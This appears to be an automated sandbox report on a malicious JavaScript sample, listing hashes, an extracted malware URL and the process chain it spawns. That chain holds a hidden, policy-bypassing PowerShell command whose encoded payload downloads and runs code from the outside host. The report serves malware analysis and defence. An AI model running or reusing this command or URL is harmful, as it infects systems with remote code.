Analysis
-
max time kernel
0s -
max time network
122s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
02/01/2024, 15:55
Static task
static1
Behavioral task
behavioral1
Sample
359b12112992fb525b91de4c27d24bff.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
359b12112992fb525b91de4c27d24bff.js
Resource
win10v2004-20231215-en
General
-
Target
359b12112992fb525b91de4c27d24bff.js
-
Size
23KB
-
MD5
359b12112992fb525b91de4c27d24bff
-
SHA1
5de67e028c5d9e43d4219a51815d7e73298ce26c
-
SHA256
88d4d3f48bd23543980b70b5a78606d80c2917bfcd960991eb9a8ddf6ac58ed2
-
SHA512
38fe4134cdd2bd4b356919789a2f0090dcd0588f4d12f1cd4f9a2ec43ec6e18b907e1751fb3a59ba34fe261c39e40ab5ecf955ef4743b6fce0576800ddce845d
-
SSDEEP
384:+YjCpsGBoQjAyo1a5mc4+Ph9wMnRBdGybNTsFO02St:+1pqQjAz1a54+pyOTsFO02St
Malware Config
Extracted
http://munardis.space/222g100/index.php
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\359b12112992fb525b91de4c27d24bff.js1⤵PID:4732
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=2⤵PID:2100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=3⤵PID:4812
-
-